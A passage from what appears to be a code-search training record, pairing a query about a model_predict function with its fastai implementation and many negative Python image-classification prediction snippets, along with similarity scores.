}\n\n return render(request, 'products/product_detail.html', context)", "def product_detail(request, product_id):\n # Search for product in Product Model using pk identifier obtained from project_id\n product = get_object_or_404(Product, pk=product_id)\n context = {\n 'product': product,\n }\n return render(request, 'products/product_detail.html', context)" ]
[ "0.6816689", "0.67486215", "0.6713748", "0.65807945", "0.65807945", "0.65807945", "0.65140444", "0.6467318", "0.6412233", "0.6406499", "0.63699645", "0.62743896", "0.62667674", "0.6252862", "0.6249236", "0.6226553", "0.619854", "0.61578506", "0.61264884", "0.61043566", "0.6066991", "0.6046339", "0.59840244", "0.5963111", "0.5929335", "0.59094274", "0.5889149", "0.5875752", "0.5870319", "0.5869933", "0.5858689", "0.5850795", "0.5843654", "0.58434194", "0.58401316", "0.58401316", "0.5818446", "0.57871073", "0.5783813", "0.5777939", "0.57236356", "0.57221955", "0.57084656", "0.57073176", "0.57072043", "0.5703722", "0.5697758", "0.56694794", "0.5654853", "0.5640192", "0.5633732", "0.56313723", "0.5627708", "0.5621521", "0.56197035", "0.55979866", "0.5581042", "0.55798435", "0.5573981", "0.55531687", "0.5540334", "0.55267924", "0.55168384", "0.5499161", "0.54870015", "0.54799", "0.54716223", "0.5466719", "0.54493403", "0.54430336", "0.54428494", "0.54377514", "0.54374367", "0.54353833", "0.5429963", "0.5429382", "0.5422704", "0.5417768", "0.54134256", "0.54047203", "0.5402637", "0.54021555", "0.54011273", "0.5400975", "0.53972465", "0.53952116", "0.5381824", "0.5381085", "0.53704834", "0.53676677", "0.53646886", "0.5362929", "0.53603196", "0.535755", "0.535496", "0.5350697", "0.5346694", "0.53410876", "0.53398484", "0.5334841", "0.5333072" ]
0.0
-1
model_predict will return the preprocessed image
def model_predict(img_path, model_path): learn = load_model(model_path) img = open_image(img_path) # get the outputs from the model pred_class,pred_idx,outputs = learn.predict(img) # return the classification the model returns return pred_class
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def predict(model, img):\n\tx = image.img_to_array(img)\n\tx = np.expand_dims(x, axis=0)\n\tx = preprocess_input(x)\n\tpreds = model.predict(x)\n\treturn preds[0]", "def predict(model, img, target_size=(229, 229)): #fixed size for InceptionV3 architecture\r\n if img.size != target_size:\r\n img = img.resize(target_size)\r\n\r\n x = image.img_to_array(img)\r\n x = np.expand_dims(x, axis=0)\r\n x = preprocess_input(x)\r\n preds = model.predict(x)\r\n return preds[0]", "def model_predict(img, model, preprocess_func):\n img = img.resize((224, 224)) # Each model expects shape: (224, 224, 3)\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n\n x = preprocess_func(x)\n preds = model.predict(x)\n return preds", "def predict(image_path):\n img = image.load_img(image_path, target_size=image_size)\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n predictions = model.predict(x)\n plt.imshow(img)\n print('Predicted:', decode_predictions(predictions, top=1)[0])\n return decode_predictions(predictions, top=1)[0]", "def predict(model, img, target_size):\n if img.size != target_size:\n img = img.resize(target_size)\n\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n preds = model.predict(x)\n return preds[0]", "def predict(model, img, target_size):\n if img.size != target_size:\n img = img.resize(target_size)\n\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n preds = model.predict(x)\n return preds[0]", "def predict(model, images):\n return model.predict_classes(images)", "def model_predict(img_path):\n img = open_image(img_path)\n pred_class, pred_idx, outputs = learn.predict(img)\n print(pred_class)\n return pred_class", "def predict(self, img):\n return self._predict([img])[0]", "def predict(image_path):\n global graph\n with graph.as_default():\n image_size = (299, 299)\n img = image.load_img(image_path, target_size=image_size)\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n predictions = model.predict(x)\n print('Predicted:', decode_predictions(predictions, top=1)[0])\n return decode_predictions(predictions, top=1)[0]", "def predict(model, img, imgSize):\n \n #Reajusta o tamanho da imagem para o tamanho esperado caso necessario.\n if img.size != imgSize :\n img = img.resize(imgSize)\n\n #Converte a imagem num array tridimensional.\n x = image.img_to_array(img)\n x = numpy.expand_dims(x, axis=0)\n #Normaliza a imagem.\n x = preprocess_input(x)\n \n #Faz a previsao atraves da rede.\n pred = model.predict(x)\n return imagenet_utils.decode_predictions(pred, top=5)[0]", "def predict(model, img, target_size, top_n=3):\r\n print('img.size=',img.size)\r\n if img.size != target_size:\r\n img = img.resize(target_size)\r\n \r\n x = image.img_to_array(img)\r\n x = np.expand_dims(x, axis=0)\r\n x = preprocess_input(x)\r\n preds = model.predict(x)\r\n return decode_predictions(preds,top=top_n)[0]", "def predict(self, images, batch_size):\n pass", "def predict(input_shape, model, image_path):\n \n # Load and resize the image using PIL.\n img = PIL.Image.open(image_path)\n print('input_shape: ', input_shape)\n img_resized = img.resize(input_shape, PIL.Image.LANCZOS)\n\n # Plot the image.\n plt.imshow(img_resized)\n plt.show()\n\n # Convert the PIL image to a numpy-array with the proper shape.\n img_array = np.expand_dims(np.array(img_resized), axis=0)\n\n # Use the ResNet50 model to make a prediction.\n # This outputs an array with 1000 
numbers corresponding to\n # the classes of the ImageNet-dataset.\n pred = model.predict(img_array)\n \n # Decode the output of the ResNet50 model.\n pred_decoded = decode_predictions(pred)[0]\n\n # Print the predictions.\n for code, name, score in pred_decoded:\n print(\"{0:>6.2%} : {1}\".format(score, name))\n \n return", "def predict(self, image):\n\n if self.__preprocess != None:\n image = self.__preprocess(image)\n\n result = self.__model.predict(image)\n\n if self.__postprocess != None:\n result = self.__postprocess(result)\n\n return result", "def predict_one_image(img_path, prediction_model):\n # Load image and resize it\n img = image.load_img(img_path, target_size=(224, 224))\n # Transform it in array\n x = image.img_to_array(img)\n # Expand array dimension\n x = np.expand_dims(x, axis=0)\n # Make prediction\n prediction_score = prediction_model.predict(x)\n return prediction_score", "def singlePrediction(self,img):\n self.optimizer = SGD(lr = 0,momentum=0,decay = 0)\n self.createModel()\n output = self.model.predict(np.expand_dims(img,axis = 0))\n return output", "def predict_data(img): \n return gennet.predict_data(img, 'Resnet50')", "def prediction(self, X):\n images = self.preprocess_images(X)\n return self.model.predict(images)", "def predict(cls, image_path: str) -> tuple:\n\n print(\"Classify input image: \")\n return cls.model.predict(image_path)", "def predict(self, img_path):\n\n img = cv2.imread(img_path)\n img0 = img.copy()\n \n #This happens inside datasets\n # Convert\n img = letterbox(img, new_shape=self.img_size)[0]\n\n # Convert\n img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416\n img = np.ascontiguousarray(img)\n \n #this happens on detect\n img = torch.from_numpy(img).to(self.device)\n img = img.float() # uint8 to fp16/32\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n\n # Inference\n pred = self.model(img)[0]\n\n # Apply NMS\n pred = non_max_suppression(pred, self.conf_thres, self.iou_thres, classes=self.classes, agnostic=self.agnostic_nms)\n \n # Process detections\n for i, det in enumerate(pred): # detections per image\n if det is not None and len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], img0.shape).round()\n\n pred = [d.cpu().detach().numpy() for d in pred if d is not None]\n pred = pred[0] if len(pred) else pred\n \n pred = [[[x1, y1, x2, y2],conf] for x1, y1, x2, y2, conf, clss in pred]\n\n return pred", "def predict(self, image_to_predict):\n\n y_pred = self.classifier.predict(image_to_predict)\n\n return y_pred", "def _predict_image(im, net, transformer):\n\n net.blobs[\"data\"].data[...] 
= transformer.preprocess(\"data\", im)\n out = net.forward()\n\n probs = out[\"prob\"][0]\n prob_cloud = probs[1] * 100.0\n return prob_cloud", "def predict(model, input_file):\n if input_file.endswith(\".json\"):\n with open(input_file,\"w\") as fd:\n data = json.loads(input_file)\n else:\n data = imread(input_file)\n result = model.predict(data)\n print(\"Model predicted class: %s\"%result)\n return result", "def predict(self, sess, img_data):\n\n with sess.as_default():\n new_image = self.preprocess(img_data, self.input_shape)\n input_feed = self.create_input_feed(sess, new_image, img_data)\n output_fetch = self.create_output_fetch(sess)\n all_classes, all_scores, all_bboxes = sess.run(output_fetch, input_feed)\n\n return all_classes, all_scores, all_bboxes", "def warmup_predict(model, imgs, Npred):\n H = augmented_state_matrix(model[:-1], imgs, 0)\n h0 = H[-2]\n y0 = imgs[-1]\n return predict(model, y0, h0, Npred)", "def predict(self, request):\r\n f = request.files['image']\r\n \r\n img = Image.open(f)\r\n \r\n image = img.convert('RGB')\r\n \r\n image_np = load_image_into_numpy_array(image)\r\n output_dict = run_inference_for_single_image(model, image_np)\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image_np,\r\n output_dict['detection_boxes'],\r\n output_dict['detection_classes'],\r\n output_dict['detection_scores'],\r\n category_index,\r\n instance_masks=output_dict.get('detection_masks_reframed', None),\r\n use_normalized_coordinates=True,\r\n line_thickness=2, \r\n min_score_thresh=0.45, \r\n skip_scores=True)\r\n \r\n result_image = Image.fromarray(image_np)\r\n \r\n raw_bytes = BytesIO()\r\n result_image.save(raw_bytes, \"PNG\")\r\n \r\n return base64.b64encode(raw_bytes.getvalue()).decode(\"utf-8\")", "def predictImage(model, image):\n # Reshape\n x = image[np.newaxis, ::]\n\n # Standardise range\n x = x.astype(np.float32) / 255.\n\n # Prediction\n preds = model.predict(x)[0].reshape(image.shape[0],\n image.shape[0],\n model.layers[-1].output_shape[-1])\n # class_img\n class_img = np.argmax(preds, axis=-1)\n\n return (preds, class_img)", "def predict(self): \n return self.model.predict(self.test_x)", "def post(self):\n result = {'status': 'error'}\n\n args = input_parser.parse_args()\n input_data = args['image'].read()\n image = self.model_wrapper._read_image(input_data)\n preds = self.model_wrapper._predict(image)\n\n # Modify this code if the schema is changed\n label_preds = [{'label_id': p[0], 'label': p[1], 'probability': p[2]} for p in [x for x in preds]]\n result['predictions'] = label_preds\n result['status'] = 'ok'\n\n return result", "def prediction_on_a_image(self, input, output,model_saved_path):\n\n # load the saved model\n if os.path.isfile(model_saved_path) is False:\n raise IOError('trained model: %s not exist' % model_saved_path)\n\n clf = joblib.load(model_saved_path)\n\n # split a large image to many small ones\n patch_w = 500 # parameters.get_digit_parameters(\"\", \"train_patch_width\", None, 'int')\n patch_h = 500 # parameters.get_digit_parameters(\"\", \"train_patch_height\", None, 'int')\n overlay_x = 0 # parameters.get_digit_parameters(\"\", \"train_pixel_overlay_x\", None, 'int')\n overlay_y = 0 # parameters.get_digit_parameters(\"\", \"train_pixel_overlay_y\", None, 'int')\n\n img_folder = os.path.dirname(input)\n img_name = os.path.basename(input)\n inf_list_txt = 'inf_image_list.txt'\n with open(inf_list_txt, 'w') as txt_obj:\n txt_obj.writelines(img_name + '\\n')\n\n img_patches = build_RS_data.make_dataset(img_folder, inf_list_txt, 
patch_w, patch_h, overlay_x, overlay_y,\n train=False)\n\n for img_idx, aImg_patches in enumerate(img_patches):\n inf_output_dir = 'inf_results' #os.path.splitext(img_name)[0]\n os.system('mkdir -p '+inf_output_dir)\n os.system('rm '+inf_output_dir+'/*')\n\n ## parallel inference patches\n # but it turns out not work due to the Pickle.PicklingError\n # not working due to mulitple parameters. Jan 9, 2019, hlc\n # use multiple thread\n num_cores = multiprocessing.cpu_count()\n print('number of thread %d' % num_cores)\n # theadPool = mp.Pool(num_cores) # multi threads, can not utilize all the CPUs? not sure hlc 2018-4-19\n theadPool = Pool(num_cores) # multi processes\n\n # inference_one_patch_svm(img_idx, image_count, p_idx, patch_count, inf_output_dir, img_patch, scaler,clf)\n\n parameters_list = [\n (img_idx, len(img_patches), idx, len(aImg_patches), inf_output_dir, img_patch, self._scaler, clf)\n for (idx, img_patch) in enumerate(aImg_patches)]\n # results = theadPool.map(inference_one_patch_svm, parameters_list) # not working\n results = theadPool.starmap(inference_one_patch_svm, parameters_list) # need python3\n print('result_list', results)\n\n # for p_idx, img_patch in enumerate(aImg_patches):\n # # read images\n # patch_data = build_RS_data.read_patch(img_patch) # read_whole_x_pixels(input)\n #\n # nbands, height, width = patch_data.shape\n #\n # X_predit = patch_data.reshape(nbands, -1)\n # X_predit = np.transpose(X_predit, (1, 0))\n #\n # if os.path.isfile(scaler_saved_path) and self._scaler is None:\n # self._scaler = joblib.load(scaler_saved_path)\n # result = self._scaler.transform(X_predit)\n # X = result.tolist()\n # elif self._scaler is not None:\n # result = self._scaler.transform(X_predit)\n # X = result.tolist()\n # else:\n # X = X_predit\n # basic.outputlogMessage('warning, no pre-processing of data before prediction')\n #\n # # more method on prediction can be foudn in :\n # # https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html\n # pre_result = clf.predict(X)\n # result_img = pre_result.reshape((height, width))\n #\n # # save results\n # print('Save patch:%d/%d on Image:%d/%d , shape:(%d,%d)' %\n # (p_idx,len(aImg_patches), img_idx,len(img_patches), result_img.shape[0], result_img.shape[1]))\n #\n # # short the file name to avoid error of \" Argument list too long\", hlc 2018-Oct-29\n # file_name = \"I%d_%d\" % (img_idx, p_idx)\n #\n # save_path = os.path.join(inf_output_dir, file_name + '.tif')\n # build_RS_data.save_patch_oneband_8bit(img_patch,result_img.astype(np.uint8),save_path)\n #\n # with rasterio.open(input) as src_obj:\n # # Set spatial characteristics of the output object to mirror the input\n # kwargs = src_obj.meta\n # kwargs.update(\n # dtype=rasterio.uint8,\n # count=1)\n # # Create the file\n # with rasterio.open(output, 'w', **kwargs) as dst:\n # dst.write_band(1, result_img.astype(rasterio.uint8))\n # basic.outputlogMessage(\"save to %s\" % output)\n\n return True", "def predict_car():\n img = open_image(request.files['image'])\n pred_class, pred_idx, outputs = learn.predict(img)\n return str(pred_class)", "def predict() -> Any:\n threshold = request.form.get(\"threshold\", type=float)\n source_size = request.form.get(\"source_size\", type=bool)\n images = request.files.getlist(\"images\")\n result = {}\n for image in images:\n input_image = prepare_input(image)\n if input_image is not None:\n output_image = model.predict(input_image, threshold, source_size)\n if output_image is not None:\n result[image.filename] 
= prepare_output(output_image)\n else:\n result[image.filename] = None\n else:\n result[image.filename] = None\n return result", "def make_prediction(*, input_image):\n \n pipeline = Pipeline(model)\n resized_image = pipeline.resize_image(input_image)\n prediction = argmax(pipeline.make_prediction(resized_image))\n \n return prediction", "def predict(model, np_image, topk, gpu):\n\n # Convert image to tensor\n np_image = np.expand_dims(np_image, axis=0)\n img_tensor = torch.from_numpy(np_image)\n # Convert to float\n float_tensor = img_tensor.type(torch.FloatTensor)\n \n image_pred = float_tensor.to('cuda')\n \n model.eval()\n \n with torch.no_grad():\n outputs = model(image_pred)\n \n probs = torch.exp(outputs) \n # Find topk \n probs, labels = probs.topk(k=topk) \n # From torch to numpy to lists\n if gpu == True:\n probs, labels = probs.to('cpu'), labels.to('cpu')\n probs, labels = probs.numpy(), labels.numpy()\n probs, labels = probs[0].tolist(), labels[0].tolist()\n \n idx_to_class = {val: key for key, val in \n model.class_to_idx.items()}\n # Map labels to class in index\\\n labels = [idx_to_class[lab] for lab in labels]\n return probs, labels", "def predict(self, data: np.array) -> np.array:\n return self.model.predict(squeeze_keep_batch(data))", "def predict():\r\n \r\n data = {\"success\": False}\r\n if flask.request.files.get(\"image\"):\r\n # read image from request\r\n image = flask.request.files[\"image\"].read()\r\n # convert image to BGR\r\n image = read_image_bgr(io.BytesIO(image))\r\n # preprocess image for model\r\n image = preprocess_image(image, mode='pass')\r\n image, scale = resize_image(image)\r\n data[\"scale\"] = scale\r\n\r\n # process image\r\n with graph.as_default():\r\n start_time = time.time()\r\n # generate prediction bounding boxes, scores, and labels on the input image\r\n boxes, scores, labels = model.predict(np.expand_dims(image, axis=0))\r\n # add inference time to data dictionary\r\n data[\"time\"] = time.time() - start_time\r\n\r\n # add prediction boxes, scores, & labels to data dictionary\r\n data[\"predictions\"] = {\"boxes\": boxes.tolist(),\r\n \"scores\": scores.tolist(),\r\n \"labels\": labels.tolist()}\r\n\r\n # prediction was successful\r\n data[\"success\"] = True\r\n \r\n # return the data dictionary as a JSON response\r\n return flask.jsonify(data)", "def predict(image):\n with tf.Session(graph=graph) as session:\n saver = tf.train.Saver()\n saver.restore(session, \"saved_models/model12.ckpt\")\n print(\"Model restored.\")\n feed_dict = {tf_sample_dataset : image}\n predictions = session.run(train_prediction, feed_dict=feed_dict)\n # Prints an array of softmax probabilities for each digit in the number\n print str(predictions)\n return np.argmax(predictions, 2)", "def fit_predict(self):\n self.classifier = self.model\n self.classifier.fit(self.X_sample, self.y_sample)\n self.y_pred = self.classifier.predict(self.X_test)", "def predict_from_model(patch, model):\n\n prediction = model.predict(patch.reshape(1, 256, 256, 3))\n prediction = prediction[:, :, :, 1].reshape(256, 256)\n return prediction", "def get_predictions(self, img):\n \n predictions = self.tf_model.predict_proba(img)\n prediction = np.argmax(predictions, axis=-1)\n \n return prediction", "def predict(trained_model, X_test, y_test, image_name):\n if MODEL == 1:\n return predict_1(trained_model, X_test, y_test)\n elif MODEL == 3:\n if CROSS_VALIDATION:\n return cv_predict_3(trained_model, X_test, y_test)\n else:\n return predict_3(trained_model, X_test, y_test, image_name)\n 
elif MODEL == 2:\n return predict_2(trained_model, X_test, y_test)\n else:\n # For models 4, 5 and 6\n return predict_4(trained_model, X_test, y_test)", "def predict(trainer, img_path, patch_size, device='cpu'):\n\n img = imread(img_path)\n patches = divide_image_to_patches(img, patch_size)\n predictions = []\n\n for patch in patches:\n input_ = TF.to_tensor(Image.fromarray(patch)).to(device).unsqueeze(0)\n prediction = trainer.postprocess(trainer.model(input_))\n prediction = prediction.detach().cpu().numpy()\n predictions.append(prediction[..., np.newaxis])\n\n predictions = np.concatenate(predictions)\n\n return combine_patches_to_image(predictions, img.shape[0], img.shape[1])", "def classify(img, c_model):\n #global class_graph\n\n #img = load_img(im_path,target_size=(input_height, input_width))\n #img = img_to_array(img)\n im_size = 128\n # resize \n\n img = cv2.resize(img, (im_size,im_size))\n\n img = img.astype(\"float\") / 255.0\n img = np.expand_dims(img, axis=0)\n with class_graph.as_default():\n predictions = c_model.predict(img)[0]\n\n return predictions", "def target_predict(self, inp):\n return self.target_model.predict(inp)", "def class_predict(trained_model, X_test, y_test, image_name):\n if MODEL == 1:\n return class_predict_3(trained_model, X_test, y_test, image_name)\n elif MODEL == 3:\n return class_predict_3(trained_model, X_test, y_test, image_name)\n elif MODEL == 2:\n return class_predict_2(trained_model, X_test, y_test)\n else:\n # For models 4, 5 and 6\n return class_predict_3(trained_model, X_test, y_test, image_name)", "def predict(self, data, version='default'):\n return self.skil.api.transformimage(\n deployment_name=self.deployment.name,\n image_transform_name=self.model_name,\n version_name=version,\n files=data\n )", "def predict(self, x):\n return self.model.predict(x, batch_size=1, verbose=0)", "def predict(self):\n self.canv.update()\n ps = self.canv.postscript(colormode='mono')\n img = Image.open(io.BytesIO(ps.encode('utf-8')))\n img.save('result.png')\n x = Predict.transform_image(self)\n \n #prediction with multivariate regression\n Y_hat_test = self.multivariate_model.predict([x])\n C_multivariate = map(np.argmax, Y_hat_test) # classification vector\n C_multivariate = list(C_multivariate)\n multivariate_predict = C_multivariate[0]\n\n \n #prediction with Linear Discriminant Analysis (LDA)\n lda_predict = self.lda_model.predict([x])[0]\n qda_predict = self.qda_model.predict([x])[0]\n log_predict = self.log_model.predict([x])[0]\n \n baseline_label = Label(self, text='Baseline: ' + str(multivariate_predict) )\n baseline_label.grid(row=0, column=1, padx=5, pady=5)\n lda_label = Label(self, text=' LDA: '+ str(lda_predict))\n lda_label.grid(row=0, column=2, padx=5, pady=5)\n qda_label = Label(self, text='QDA: '+ str(qda_predict))\n qda_label.grid(row=1, column=1, padx=5, pady=5)\n log_label = Label(self, text=' Logistic: '+str(log_predict))\n log_label.grid(row=1, column=2, padx=5, pady=5)", "def predict(self, img):\n logger.info(\"predict() for %s\" %threading.current_thread())\n\n #detect face from the image\n face, rect = self.detect_face(img)\n\n if face is None or rect is None:\n #print(\"No face found for img \", type(img))\n return None, None, None, None\n\n if self.redis_server_password is None:\n # No training data available. Just perform detection and return\n # an error message in the subject value.\n warning = \"Training data not available. 
Redis password not set.\"\n subject = \"No Training Password\" # This will be displayed with the face\n confidence = 0\n logger.warning(\"%s\" %warning)\n return None, subject, confidence, rect\n\n #predict the image using our face recognizer\n label, confidence = self.face_recognizer.predict(face)\n #get name of respective label returned by face recognizer\n label_text = self.face_recognizer.getLabelInfo(label)\n logger.info(\"label=%s label_text=%s\" %(label, label_text))\n\n # print(label_text, confidence, rect)\n return img, label_text, confidence, rect", "def predict(self, data):\n return self.model.predict(data, batch_size=data.shape[1])", "def predict(self, input):\n input = input.reshape((input.shape[0], 1))\n return self.feedforward(input)", "def predict_step(self, *args: Any, **kwargs: Any) -> Tensor:\n batch = args[0]\n x = batch[\"image\"]\n y_hat: Tensor = self(x).softmax(dim=1)\n return y_hat", "def predict_file(img_path, model):\n return gennet.predict_file(img_path, 'Resnet50', model)", "def Predict_image(image_path, model, show_img = True):\n test_image, preprocessed_image = Preproces_image(image_path)\n predictions = model.predict(preprocessed_image)\n prediction = Configs.CLASS_NAMES[np.argmax(predictions)]\n if show_img:\n plt.imshow(test_image)\n plt.title(prediction)\n plt.axis(\"off\")\n plt.show()\n return print(f\"Predictiona: {prediction}\")\n else:\n return print(f\"Predictiona: {prediction}\")", "def model_predict(self, X):\n return self.cmodel.predict(X=X)", "def predict(self, image, normalize=True):\n\n # Image preprocessing\n image = cv2.resize(image, (224, 224), interpolation=cv2.INTER_CUBIC)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # Array preprocesing\n image = np.moveaxis(image, -1, 0)\n image = np.array([image], dtype=np.float64)\n\n rep = self.model.predict(image)\n\n if normalize:\n return rep.astype(np.float64) / np.linalg.norm(rep)\n\n else:\n return rep.astype(np.float64)", "def predict(self, to_predict):\n\t\treturn self.model.predict(to_predict)", "def predict(cls, input):\n clf = cls.get_model()\n print('input=')\n print(input)\n return clf.predict(input)", "def predict():\n # initialize the data dictionary that will be returned from the\n # view\n data = {\"success\": False}\n\n # ensure an image was properly uploaded to our endpoint\n if flask.request.method == \"POST\":\n if flask.request.files.get(\"image\"):\n # read the image in PIL formats\n img = flask.request.files[\"image\"].read()\n img = Image.open(io.BytesIO(img))\n\n # preprocess the image and prepare it for classification\n img = predictor.prepare_image(img, target_size=(299, 299), http_request=True)\n\n # classify the input image and then initialize the list\n # of predictions to return to the client\n predictions = predictor.model.predict(img)\n\n dog_label = predictor.decode_prediction(np.argmax(predictions, axis=-1)[0])\n print(dog_label)\n result = {\"label\" : str(dog_label), \"probability\" : float(np.max(predictions[0]))}\n data[\"predictions\"] = result\n\n # indicate that the request was a success\n data[\"success\"] = True\n\n # return the data dictionary as a JSON response\n return flask.jsonify(data)", "def predict(self, x):\n # *** START CODE HERE ***\n return self.clf.predict_classes(x.reshape(x.shape[0], 28, 28, 1))\n # *** END CODE HERE ***", "def predict(input):\n pf = process_input(input)\n # Reshape data to be [samples][pixels][width][height]\n pf = pf.reshape(pf.shape[0], 1, 28, 28).astype('float32')\n # Normalize inputs from 0-255 to 0-1\n pf = pf 
/ 255\n pr = classifier.predict_classes(pf)\n # Cast the numpy array predicted values as a list.\n return list(map(lambda x: int(x), pr))", "def predict(self):\n batch = get_predict_batch(1, num_rec_out=self.num_test_rec)\n self.g_model.test_batch(\n batch, self.global_step, num_rec_out=self.num_test_rec)", "def predict(self, model, x_test):\n pass", "def predict(self, image):\n if len(image.shape) == 3:\n return self._predict_single(image)\n elif len(image.shape) == 4:\n return self._predict_batch(image)\n else:\n raise ValueError('Wrong image format.')", "def gp_predict(model, params):\n predic = model.predict(params)\n return predic[0]", "def predict(self, model, context, data):\n pass", "def pre_analyse():\n t = transform()\n model = modified_resnet50()\n model.load_state_dict(\n torch.load(\n \"model.pth.tar\",\n map_location=torch.device(\"cpu\"),\n )[\"state_dict\"]\n )\n model.eval()\n\n def get_preds(img_path):\n \"\"\"\n Gives labelds and probabilities for a single image\n This is were we preprocess the image, using a function defined in the model class\n \"\"\"\n # load image\n img = Image.open(img_path).convert(\"RGB\")\n # process it\n x = t(img)\n # get in in the right format\n x = Variable(x).unsqueeze(0)\n # predictions\n output = model(x)\n # decode\n output = decode(output.cpu().data.numpy()[0])\n\n # filter\n # return pred, proba\n return output\n\n return get_preds(\"image.jpg\")", "def predict(self, X, pred_batch_size=None):", "def predict(self):\n path = self._artifact_repo.artifact_path(self._ARTIFACT_MODEL)\n model = tf.keras.models.load_model(path)\n\n _, _, x_test, y_test = self._load_data()\n x_test = tf.keras.utils.normalize(x_test, axis=1)\n\n preds = model.predict(x_test)\n self._show_cf_matrix(np.array([np.argmax(probas) for probas in preds]), y_test)", "def prediction(input_path=INPUT_DIR,\n output_path=OUTPUT_DIR,\n model_path=MODEL_PATH,\n test=False):\n\n X = tf.placeholder(shape=[None, chunk_size, chunk_size], dtype=tf.float32, name='input_area')\n y_inter = deepcn.deepcn(X, chunk_size, False)\n y_pred = tf.cast(tf.argmax(tf.squeeze(y_inter), -1), tf.uint8)\n\n img_ids = []\n for name in os.listdir(input_path):\n if os.path.isdir(os.path.join(input_path, name)):\n img_ids.append(name)\n all_preds = np.zeros((len(img_ids), 256, 256))\n print('num of images: ', len(img_ids))\n\n loader = tf.train.Saver()\n\n with tf.Session() as sess:\n print(\"Import model from: %s\" %model_path)\n loader.restore(sess, model_path)\n # sess.run(tf.global_variables_initializer())\n\n batch_start_pos = 0\n while batch_start_pos < len(img_ids):\n batch_size = 100\n batch_end_pos = min(batch_start_pos + batch_size, len(img_ids))\n print('predict from %s, to %s' % (batch_start_pos, batch_end_pos))\n batch = img_ids[batch_start_pos:batch_end_pos]\n pw = predict_data_wrapper.PredictWrapper(path=input_path,\n resize_size=chunk_size,\n img_ids=batch)\n input_arr = pw.ResizedTestData()\n print(\"input_arr.shape: \", input_arr.shape)\n # input test_data_batch, output prediction of shape batch_size * 256 * 256\n pred_arr = sess.run(y_pred, feed_dict={X: input_arr})\n print(\"pred_arr.shape: \", pred_arr.shape)\n all_preds[batch_start_pos:batch_end_pos] = pred_arr\n pw.OutputPrediction(pred_arr*100, path=output_path)\n batch_start_pos = batch_end_pos\n\n # Use all img_ids and all_preds to generate single cell split csv file\n pw = predict_data_wrapper.PredictWrapper(path=input_path,\n resize_size=chunk_size,\n img_ids=img_ids)\n pw.GenerateSubmit(all_preds, output_path, cutoff=0.5)", 
"def predict(self, data):\n\n prediction = None\n if self.model is not None:\n prediction = self.model.predict(data)\n return prediction", "def predict(img, model=None, verbose=0):\n if model is None:\n from aid_funcs.keraswrapper import load_model\n model = load_model(seg_model_path, custom_objects='dice_coef_loss')\n if isinstance(img, str):\n img = load_image(img)\n if not isinstance(img, (np.ndarray, np.generic) ):\n return -1\n img = pre_process_images(img)\n else:\n img = np.reshape(img, (1, 1, im_size, im_size))\n scores = model.predict(img, verbose=verbose)\n return post_process_seg_result(scores)", "def predict(model, transforms, im_path):\r\n \r\n color_map = {'1': [180, 105, 255], # HotPink\r\n '2': [255, 0, 0], # Magenta [255, 0, 255]\r\n '3': [0, 0, 255], # red\r\n '4': [255, 0, 0]} # blue\r\n\r\n with paddle.no_grad():\r\n im = cv2.imread(im_path)\r\n im = cv2.resize(im, (512, 512))\r\n image = im.copy()\r\n im, _ = transforms(im)\r\n im = im[np.newaxis, ...]\r\n im = paddle.to_tensor(im)\r\n\r\n output = model(im)[0]\r\n output = output.numpy()\r\n output = np.argmax(output, axis=1)\r\n output = output.transpose(1,2,0).astype('uint8')\r\n output = output.squeeze()\r\n for i in range(1, 3):\r\n mask = (output == i).astype(np.bool)\r\n color_mask = np.array(color_map[str(i)], dtype=np.uint8)\r\n image[mask] = image[mask] * 0.5 + color_mask * 0.5\r\n return image", "def predict(image_path, model_path, topk=5, gpu=False):\n with torch.no_grad():\n image = process_image(image_path)\n image = torch.from_numpy(image)\n image.unsqueeze_(0)\n image = image.float()\n model, _ = checkpoint_load(model_path, gpu)\n outputs = model(image)\n probs, classes = torch.exp(outputs).topk(topk)\n probs_list = probs[0].tolist()\n classes_list = classes[0].add(1).tolist()\n return probs_list, classes_list", "def predict(self, data):\n return self.result.predict(data)", "def predict(model, X_testing):\n predictions = model.predict(X_testing)\n\n return predictions", "def predict(self, X):\n if self.model is None:\n print(\"%s.predict: implement me\" % (self.__class__.__name__))\n return np.zeros((1, self.odim))", "def predict(self, image_path, topk=5, device='cpu'):\n self.model.to(device)\n self.model.eval()\n\n image = Image.open(image_path)\n np_image = self.process_image(image)\n image.close()\n image = np_image\n\n with torch.no_grad():\n image = torch.from_numpy(image).float()\n image = image.to(device)\n # reshape image to match shapes of images used from dataloaders\n image = image.view(1, *image.shape)\n output = self.model.forward(image)\n # put output back on cpu before moving to numpy\n output = output.cpu()\n\n values, indices = torch.topk(output.data, topk)\n ps = np.atleast_1d(torch.exp(values).numpy().squeeze()).tolist()\n\n idx_to_class = {\n value: key for key, value in self.model.class_to_idx.items()\n }\n classes = [idx_to_class[i]\n for i in np.atleast_1d(indices.numpy().squeeze())]\n\n return ps, classes", "def get_prediction(\n image,\n detection_model,\n image_size: int = None,\n shift_amount: list = [0, 0],\n full_shape=None,\n postprocess: Optional[PostprocessPredictions] = None,\n verbose: int = 0,\n) -> PredictionResult:\n durations_in_seconds = dict()\n\n # read image as pil\n image_as_pil = read_image_as_pil(image)\n # get prediction\n time_start = time.time()\n detection_model.perform_inference(np.ascontiguousarray(image_as_pil), image_size=image_size)\n time_end = time.time() - time_start\n durations_in_seconds[\"prediction\"] = time_end\n\n # process prediction\n 
